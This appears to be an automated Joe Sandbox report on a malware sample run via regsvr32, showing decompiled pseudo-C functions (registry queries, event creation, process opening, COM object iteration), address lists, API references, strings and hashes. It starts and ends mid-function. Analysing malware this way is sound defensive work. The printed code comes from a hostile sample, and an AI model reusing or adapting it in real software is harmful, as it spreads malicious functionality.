					if(E007A5419( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t24 =  &_a24; // 0x7a742d
							E007A5C15(_t103,  *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *_t24, _t106);
						}
						E007A2A03(_t106);
						_t104 = _a16;
					}
					_t28 =  &_a24; // 0x7a742d
					E007A2A03( *_t28);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E007A7973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x7aa38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x007a202e
0x007a2037
0x007a203e
0x007a2043
0x007a20b0
0x007a20b6
0x007a20bb
0x007a20c4
0x007a20cb
0x007a20ce
0x007a2242
0x007a2249
0x007a2249
0x007a224e
0x007a2250
0x007a2250
0x007a2259
0x007a2259
0x007a20d4
0x007a20d4
0x007a20e0
0x007a2238
0x007a223b
0x00000000
0x007a223b
0x007a20e6
0x007a20eb
0x007a20f4
0x007a20fb
0x007a20fe
0x007a2148
0x007a2165
0x007a216d
0x007a2172
0x007a217c
0x007a217c
0x007a2174
0x007a2174
0x007a2174
0x007a2174
0x007a2186
0x007a219e
0x007a21a6
0x007a21d4
0x007a21d9
0x007a21e2
0x007a21e7
0x007a21eb
0x007a221d
0x007a21ed
0x007a21ed
0x007a21fd
0x007a2210
0x007a2216
0x007a2216
0x007a21a8
0x007a21a8
0x007a21b8
0x007a21cd
0x007a21cd
0x007a2227
0x007a2230
0x007a2233
0x007a2229
0x007a222c
0x007a222c
0x007a2227
0x007a219e
0x00000000
0x007a2165
0x007a2117
0x007a2119
0x007a211e
0x007a2122
0x007a2124
0x007a2128
0x007a2132
0x007a2132
0x007a2138
0x007a213d
0x007a213d
0x007a2140
0x007a2143
0x00000000
0x007a2143
0x007a2048
0x00000000
0x007a206f
0x007a206f
0x007a207b
0x007a208e
0x007a2094
0x007a209c
0x00000000
0x007a209c

APIs

StrChrA.SHLWAPI(007A7319,0000005F,00000000,00000000,00000104), ref: 007A2061
lstrcpy.KERNEL32(?,?), ref: 007A208E

Part of subcall function 007A33FA: lstrlen.KERNEL32(?,007AA380,73BB7FC0,00000000,007A2788,?,?,?,?,?,007A3EAC,?), ref: 007A3403
Part of subcall function 007A33FA: mbstowcs.NTDLL ref: 007A342A
Part of subcall function 007A33FA: memset.NTDLL ref: 007A343C

Part of subcall function 007A33B7: lstrlenW.KERNEL32(007A7319,?,-tz,007A2202,00000000,80000002,?,-tz,74666F53,4D4C4B48,-tz,?,00000000,80000002,007A7319,?), ref: 007A33D7

Part of subcall function 007A2A03: RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

lstrcpy.KERNEL32(?,00000000), ref: 007A20B0

Strings

\, xrefs: 007A2094
-tz, xrefs: 007A20D4, 007A2186, 007A2230, 007A21ED, 007A21A8, 007A2140, 007A2128, 007A2189

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: -tz$\
API String ID: 3924217599-3514645148
Opcode ID: d5fc2009e36fcd6d8d4216b3e438991afaa9804dfdd20de922339f598c803b9d
Instruction ID: 36c55d7f8072d714014d46c81102063d4717602a4ff6c9e5832a7321994775ba
Opcode Fuzzy Hash: d5fc2009e36fcd6d8d4216b3e438991afaa9804dfdd20de922339f598c803b9d
Instruction Fuzzy Hash: 7B516C7210020AFFCF219FA8DC45EAA37B9FF8A300F108614FA1596162D73DDA26DB11

Uniqueness

Uniqueness Score: -1.00%

Function 007A4CD5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E007A4CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x7aa2c8; // 0xbd092303
				_t1 =  &_a4; // 0x7a7338
				_t32 =  *_t1;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x7aa2d0; // 0x4aed5a8
				_t3 = _t8 + 0x7ab84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E007A1970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x7aa2d4, 1, 0, _t30);
					E007A2A03(_t30);
				}
				_t12 =  *0x7aa2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E007A19E7() == 0) {
						_t28 =  *0x7aa124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E007A63CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E007A7836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x007a4cd6
0x007a4cdd
0x007a4cdd
0x007a4ce7
0x007a4ceb
0x007a4cf1
0x007a4cfe
0x007a4d05
0x007a4d09
0x007a4d1b
0x007a4d1d
0x007a4d1d
0x007a4d22
0x007a4d29
0x007a4d34
0x007a4d4a
0x007a4d4e
0x007a4d50
0x007a4d55
0x007a4d55
0x007a4d62
0x007a4d66
0x007a4d6a
0x00000000
0x00000000
0x007a4d78
0x007a4d7c
0x00000000
0x00000000
0x007a4d7c
0x007a4d66
0x00000000
0x007a4d7e
0x007a4d7e
0x007a4d7e
0x007a4d84
0x007a4d86
0x007a4d86
0x007a4d90
0x007a4d94
0x007a4da6
0x007a4da6
0x007a4daa
0x007a4db0
0x007a4db0
0x007a4db3
0x007a4db5
0x007a4db8
0x007a4db8
0x007a4dbf
0x007a4dc5
0x007a4dc5

APIs

Part of subcall function 007A1970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,007A3EC5,74666F53,00000000,?,00000000,?,?,007A2F4F), ref: 007A19A6
Part of subcall function 007A1970: lstrcpy.KERNEL32(00000000,00000000), ref: 007A19CA
Part of subcall function 007A1970: lstrcat.KERNEL32(00000000,00000000), ref: 007A19D2

CreateEventA.KERNEL32(007AA2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,007A7338,?,?,?), ref: 007A4D14

Part of subcall function 007A2A03: RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,8sz,00000000,?,00000000,?,007A7338,?,?,?,?,?,?,?,007A1C40), ref: 007A4D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,007A7338,?,?,?), ref: 007A4DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,007A7338,?,?,?), ref: 007A4DB8

Strings

8sz, xrefs: 007A4CDD, 007A4D41, 007A4D58

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID: 8sz
API String ID: 73268831-1643896621
Opcode ID: 405f4492cb2928c8032c0a4b7bffd3570790bfa8992c511a629c3198bf1240d6
Instruction ID: 7c15d3dde00acba4046da1840535058e98f52db33e1ff362e8055d88eba7215c
Opcode Fuzzy Hash: 405f4492cb2928c8032c0a4b7bffd3570790bfa8992c511a629c3198bf1240d6
Instruction Fuzzy Hash: ED21BF32700722ABD7214BA89C48B6B72D8BFCB751F054324FF41A7291DBAEDC118B85

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0FA2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6D4E0FA7

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction ID: fe9a874c504df374da96fcf93b0bc4fdc5246f18f872de6ea42a0c212c17a954
Opcode Fuzzy Hash: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction Fuzzy Hash: 3C21A4716482067FDB20DF768C80E6BB7ADEF413EA7114919F624E7A50EB30DD5087A1

Uniqueness

Uniqueness Score: -1.00%

Function 007A5419, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E007A5419(int _a4, void* _a8, int _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				intOrPtr* _t39;
				char* _t42;
				long _t43;

				if(_a4 != 0) {
					_t43 = E007A6087(_a4, _a8, _a12, _a16, _a20, _a24);
				} else {
					_t43 =  *0x7aa0d0(_a8, _a12,  &_a8);
					if(_t43 == 0) {
						RegQueryValueExW(_a8, _a16, 0,  &_a4, 0,  &_a12);
						if(_a12 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E007A5C4E(_a12);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a8, _a16, 0,  &_a4, _t42,  &_a12);
								if(_t43 != 0) {
									E007A2A03(_t42);
								} else {
									 *_a20 = _t42;
									_t39 = _a24;
									if(_t39 != 0) {
										 *_t39 = _a12;
									}
								}
							}
						}
						RegCloseKey(_a8);
					}
				}
				return _t43;
			}

0x007a5425
0x007a54cf
0x007a542b
0x007a543b
0x007a543f
0x007a545b
0x007a5460
0x007a54a8
0x007a5462
0x007a546a
0x007a546e
0x007a54a5
0x007a5470
0x007a5482
0x007a5486
0x007a549c
0x007a5488
0x007a548b
0x007a548d
0x007a5492
0x007a5497
0x007a5497
0x007a5492
0x007a5486
0x007a546e
0x007a54b0
0x007a54b0
0x007a543f
0x007a54d8

APIs

RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,007A2115,00000000,80000002,007A7319,00000000,007A7319,?,65696C43,80000002), ref: 007A545B
RegCloseKey.ADVAPI32(80000002,?,007A2115,00000000,80000002,007A7319,00000000,007A7319,?,65696C43,80000002,00000000,?), ref: 007A54B0

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,007A2115,00000000,80000002,007A7319,00000000,007A7319,?,65696C43), ref: 007A5480

Strings

6{z, xrefs: 007A5435
-tz, xrefs: 007A5423

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: QueryValue$AllocateCloseHeap
String ID: -tz$6{z
API String ID: 466008484-1668983247
Opcode ID: d4131ef23ad1ad4de634b4576713dde865cb01e895de70da30b9a889c0a74ba8
Instruction ID: 46a784089a94e04238d51efd8312f81fe19990a3f6ef37bb9b0c4ac3b33e9ddf
Opcode Fuzzy Hash: d4131ef23ad1ad4de634b4576713dde865cb01e895de70da30b9a889c0a74ba8
Instruction Fuzzy Hash: 2A213A7200055EFFCF129F94EC84CEE3B69FB89361B118625FE1596120E3399DA1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4D1B, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E4D33

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4D45
_free.LIBCMT ref: 6D4E4D57
_free.LIBCMT ref: 6D4E4D69
_free.LIBCMT ref: 6D4E4D7B

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction ID: 87609a9906461c223975c617c3859956e864a5d95ac905274ff42403ebee3eca
Opcode Fuzzy Hash: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction Fuzzy Hash: 9CF03C32408255BBDE20DE65D0C0D7B73E9AA4A3D2366880DE168DBB00CF24FC808EA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A2A18, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A2A18(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x7aa2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x7aa2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x7aa2b0 = _t6;
				 *0x7aa2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x7aa2ac = _t7;
				if(_t7 == 0) {
					 *0x7aa2ac =  *0x7aa2ac | 0xffffffff;
				}
				return 0;
			}

0x007a2a20
0x007a2a28
0x007a2a2d
0x00000000
0x007a2a7a
0x007a2a2f
0x007a2a37
0x007a2a77
0x00000000
0x007a2a77
0x007a2a39
0x007a2a3e
0x007a2a50
0x007a2a55
0x007a2a5b
0x007a2a63
0x007a2a68
0x007a2a6a
0x007a2a6a
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,007A446F,?,?,00000001), ref: 007A2A20
GetVersion.KERNEL32(?,00000001), ref: 007A2A2F
GetCurrentProcessId.KERNEL32(?,00000001), ref: 007A2A3E
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 007A2A5B
GetLastError.KERNEL32(?,00000001), ref: 007A2A7A

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: c8bf08949c054f1d02d99aa574f67fb6dc70c7954ea67a51a54e7247ddfd11af
Instruction ID: f8647a907d666e02e4ee08bd18dfd4216dc30efd7dfd9fc144cce0c89fa7fce6
Opcode Fuzzy Hash: c8bf08949c054f1d02d99aa574f67fb6dc70c7954ea67a51a54e7247ddfd11af
Instruction Fuzzy Hash: 63F01770685302AFD3209F69AD097163AA4B7CA791F10C619EA46C52E1D77D8421CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0926, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E0AC0

Strings

*?, xrefs: 6D4E0969

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction ID: 84d1a3c2f1e42a49b9fbb3f91081446061c26815b60ba2295d3cd1d7bed5a214
Opcode Fuzzy Hash: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction Fuzzy Hash: 91614075D0421AAFDB15CFAAC8809EEFBF5FF48354B258169D864E7300DB359E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E473A, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D4E3ECF: GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17

WriteFile.KERNEL32(?,00000000,6D4E27CC,?,00000000,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC,?), ref: 6D4E488B
GetLastError.KERNEL32 ref: 6D4E4895
__dosmaperr.LIBCMT ref: 6D4E48DA

Strings

['Nm, xrefs: 6D4E4875, 6D4E4864, 6D4E4854, 6D4E4844, 6D4E4808, 6D4E47EE, 6D4E47F2, 6D4E480D, 6D4E4849, 6D4E4859, 6D4E4869

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ['Nm
API String ID: 251514795-1572042932
Opcode ID: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction ID: be01dc899dbaa7fcbc4affa0171e3af640204efa60aa4bc1744593fa648cb33f
Opcode Fuzzy Hash: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction Fuzzy Hash: 5351E075A0421ABBEF01CBA8C880FEE7BB8BF4E3DAF120555E514A7251D770DD018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDD66, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6D4DDD8B
CatchIt.LIBVCRUNTIME ref: 6D4DDE71

Strings

MOC, xrefs: 6D4DDD9D
RCC, xrefs: 6D4DDDA5

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction ID: f0e64566a6de7176826e379737fd5114846be050f947485f646a0af8f6c3028b
Opcode Fuzzy Hash: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction Fuzzy Hash: 5041587190060AAFCF41CF94CC90EEE7BB5BF88304F258099EA19A7221D335AD50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD759, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6D4DD820
___AdjustPointer.LIBCMT ref: 6D4DD843
___AdjustPointer.LIBCMT ref: 6D4DD8DF

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction ID: 73e83428b56918b278c83cafe28ad0634f5bd3342b488396aba04ea090308d2e
Opcode Fuzzy Hash: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction Fuzzy Hash: 1D51DF72909706AFEB568F14C8A0F7A77A4BF85714F24452DE9A197290D731EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007A13B4, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E007A13B4(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x7aa2d0; // 0x4aed5a8
					_t5 = _t102 + 0x7ab038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x7a92d0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x7aa2d0; // 0x4aed5a8
												_t28 = _t108 + 0x7ab0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x7aa2d0; // 0x4aed5a8
														_t33 = _t78 + 0x7ab078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x007a13b9
0x007a13c2
0x007a13c3
0x007a13c7
0x007a13cd
0x007a13d3
0x007a13dc
0x007a13e2
0x007a13ec
0x007a13ee
0x007a13f4
0x007a13f9
0x007a1404
0x007a140c
0x007a140f
0x007a1532
0x007a1415
0x007a1415
0x007a1422
0x007a1428
0x007a142e
0x007a1432
0x007a1438
0x007a1445
0x007a1449
0x007a144f
0x007a1452
0x007a1458
0x007a145e
0x007a1464
0x007a1467
0x007a146a
0x007a1470
0x007a1479
0x007a147f
0x007a1480
0x007a1483
0x007a1484
0x007a1485
0x007a148d
0x007a148e
0x007a148f
0x007a1491
0x007a1495
0x007a1499
0x00000000
0x00000000
0x007a149f
0x007a14a8
0x007a14ae
0x007a14b8
0x007a14bc
0x007a14be
0x007a14cb
0x007a14cf
0x007a14d7
0x007a14dc
0x007a14ee
0x007a14f0
0x007a14f6
0x007a14f6
0x007a14ff
0x007a14ff
0x007a1501
0x007a1507
0x007a1507
0x007a150a
0x007a1510
0x007a1513
0x007a151c
0x00000000
0x00000000
0x00000000
0x007a151c
0x007a1470
0x007a146a
0x007a1452
0x007a1522
0x007a1522
0x007a1528
0x007a1528
0x007a152e
0x007a152e
0x007a1537
0x007a153d
0x007a153d
0x007a13f9
0x007a1546

APIs

SysAllocString.OLEAUT32(007A92D0), ref: 007A1404
lstrcmpW.KERNEL32(00000000,0076006F), ref: 007A14E6
SysFreeString.OLEAUT32(00000000), ref: 007A14FF
SysFreeString.OLEAUT32(?), ref: 007A152E

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 87efb0335bc8ad88547ec8b977f1e30ff9d1d890012993fd53c20339a45f6a2e
Instruction ID: 890c785cdcb3e06ae318067306af89c0796b7908acbbc34a110dbf79dded783d
Opcode Fuzzy Hash: 87efb0335bc8ad88547ec8b977f1e30ff9d1d890012993fd53c20339a45f6a2e
Instruction Fuzzy Hash: 62512276D00509EFDB00DFA8C8889AEB7B9FFC9705F148694E916EB211D7359D41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007A1E91, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E007A1E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E007A5278(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
